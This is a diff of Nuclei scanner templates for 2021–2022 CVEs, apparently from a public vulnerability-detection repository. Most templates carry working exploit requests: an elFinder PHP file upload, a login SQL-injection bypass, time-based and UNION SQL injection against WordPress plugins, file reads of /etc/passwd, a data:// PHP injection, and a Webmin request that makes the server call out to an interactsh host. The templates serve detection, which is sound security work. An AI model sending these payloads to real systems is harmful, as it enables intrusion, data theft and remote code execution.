A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,elfinder,upload,rce,intrusive
requests:
- raw:
- |
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1
Host: {{Hostname}}
- |
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code == 200"
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
internal: true

47
cves/2021/CVE-2021-43510.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-43510
info:
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-43510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43510
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,simpleclientmanagement,sqli,auth-bypass
requests:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3d'1'--+-&password=as
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "text/html")'
- 'status_code_1 == 200'
- 'contains(body_1, "{\"status\":\"success\"}")'
- 'contains(body_2, "Welcome to Simple Client")'
condition: and
# Enhanced by md on 2022/12/08

8
cves/2021/CVE-2021-43734.yaml
View File

@ -17,18 +17,22 @@ info:
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: cve,cve2021,kkfileview,traversal
tags: cve,cve2021,kkfileview,traversal,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:

2
cves/2021/CVE-2021-43778.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong
severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

21
cves/2021/CVE-2021-44152.yaml
View File

@ -1,20 +1,25 @@
id: unauth-rlm
id: CVE-2021-44152
info:
name: Reprise License Manager 14.2 - Authentication Bypass
author: Akincibor
severity: critical
description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
description: |
Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
- https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
- http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44152
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44152
cwe-id: CWE-287
tags: unauth,rlm,packetstorm
metadata:
verified: true
shodan-query: http.html:"Reprise License Manager"
google-dork: inurl:"/goforms/menu"
tags: cve2021,rlm,auth-bypass,packetstorm,cve
requests:
- method: GET
@ -23,13 +28,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "RLM Administration Commands"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03

54
cves/2021/CVE-2021-44451.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-44451
info:
name: Apache Superset Default Login
name: Apache Superset - Default Login
author: dhiyaneshDK
severity: medium
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
@ -25,17 +25,18 @@ requests:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
- |
GET /dashboard/list/ HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
@ -43,32 +44,25 @@ requests:
password:
- admin
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- 'session'
- type: word
part: body_3
words:
- 'DashboardFilterStateRestApi'
extractors:
- type: regex
name: csrf_token
group: 1
part: body
internal: true
regex:
- 'value="(.*?)">'
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
- type: word
part: header
words:
- 'session'
- type: status
status:
- 302
# Enhanced by mp on 2022/03/02
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true

2
cves/2021/CVE-2021-45232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.

6
cves/2022/CVE-2022-0147.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

35
cves/2022/CVE-2022-0346.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0346
info:
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
author: Akincibor
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
author: Akincibor,theamanrawat
severity: medium
description: |
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
@ -17,34 +17,27 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
requests:
- method: GET
path:
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
stop-at-first-match: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, ' type specified')"
condition: or
- type: word
part: body_1
words:
- "<img src onerror=alert(document.domain)>"
- "Invalid Provider type specified"
condition: and
- type: word
part: header
part: body_2
words:
- text/html
- "2ef3baa95802a4b646f2fc29075efe34"
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# Enhanced by md on 2022/09/08
# Enhanced by md on 2022/12/09

40
cves/2022/CVE-2022-0349.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-0349
info:
name: WordPress NotificationX <2.3.9 - SQL Injection
author: edoardottt
severity: critical
description: |
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
- https://wordpress.org/plugins/notificationx/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0349
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nx_id=sleep(6) -- x
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and
# Enhanced by md on 2022/12/09

6
cves/2022/CVE-2022-0434.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0434
info:
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
name: WordPress Page Views Count <2.4.15 - SQL Injection
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/09

100
cves/2022/CVE-2022-0735.yaml Normal file
View File

@ -0,0 +1,100 @@
id: CVE-2022-0735
info:
name: GitLab CE/EE - Runner Registration Token Disclosure
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
reference:
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0735
cwe-id: CWE-863
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2022,gitlab
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
- "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
- "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors:
- type: regex
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'

38
cves/2022/CVE-2022-0785.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2022-0785
info:
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
reference:
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0785
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0785
cwe-id: CWE-89
metadata:
verified: "true"
tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and
# Enhanced by md on 2022/12/09

33
cves/2022/CVE-2022-0786.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2022-0786
info:
name: KiviCare < 2.3.9 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
- https://wordpress.org/plugins/kivicare-clinic-management-system/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
classification:
cve-id: CVE-2022-0786
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Doctor details")'
condition: and

41
cves/2022/CVE-2022-0788.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-0788
info:
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0788
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
requests:
- raw:
- |
@timeout: 10s
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and
# Enhanced by md on 2022/12/09

43
cves/2022/CVE-2022-0817.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-0817
info:
name: WordPress BadgeOS <=3.7.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
variables:
num: "999999999"
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(body, md5(num))"
- 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")'
condition: and
# Enhanced by md on 2022/12/09

52
cves/2022/CVE-2022-0824.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-0824
info:
name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
author: cckuailong
severity: high
description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
reference:
- https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-0824
- https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
- https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-0824
cwe-id: CWE-284
tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
requests:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: redirect=1;testing=1;PHPSESSID=;
user={{username}}&pass={{password}}
- |
POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{RootURL}}/filemin/?xnavigation=1
link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "Failed to write to /{{ranstr}}/index.html"

39
cves/2022/CVE-2022-0826.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-0826
info:
name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
- https://wordpress.org/plugins/wp-video-gallery-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0826
cwe-id: CWE-89
metadata:
verified: true
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
requests:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Registred videos :")'
condition: and

46
cves/2022/CVE-2022-0867.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2022-0867
info:
name: WordPress ARPrice <3.6.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0867
cwe-id: CWE-89
metadata:
verified: "true"
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
- |
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(content_type_1, "text/html")'
